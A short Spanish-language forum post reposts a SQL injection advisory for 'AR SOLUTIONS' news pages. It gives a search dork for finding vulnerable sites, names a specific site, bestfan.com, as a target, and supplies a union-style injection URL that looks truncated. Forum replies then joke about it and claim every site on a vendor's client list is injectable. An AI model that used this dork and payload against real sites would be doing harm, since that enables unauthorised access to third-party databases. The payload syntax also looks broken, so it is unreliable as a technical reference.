vulnerable a injeccion remota SQL

**********************************************
********************ruben_linux***************
**********************************************
******vulnerable a injeccion remota SQL*******

autor==>ruben_linux
equipo=>ruben_linux

[+] DORK: "AR SOLUTIONS" inurl:viewnews.php?id=

[+] URL: http://bestfan.com/viewnews.php?id=[sqli]

[+] EJEMPLO:
http://bestfan.com/viewnews.php?id=253+and+1=0+1,2,3,4,5,6,7,8,9,10,11,12--

***********************************************
******************ruben_linux******************
***********************************************

fuente: http://packetstormsecurity.org/files/view/104643/arsolutions-sql.txt

¿Se puede saber qué cojones es esto?

Tiene toda pinta de una inyección SQL, pero espera a ver si es en 3D.... :D

Tambien todos los sitios listados aca:
http://www.XXXX.com/listadodeclientes/?lang=es

Todos estos sitios de esa lista tienen inyeccion sql.

variable:
www.sitioweb.com/cat?=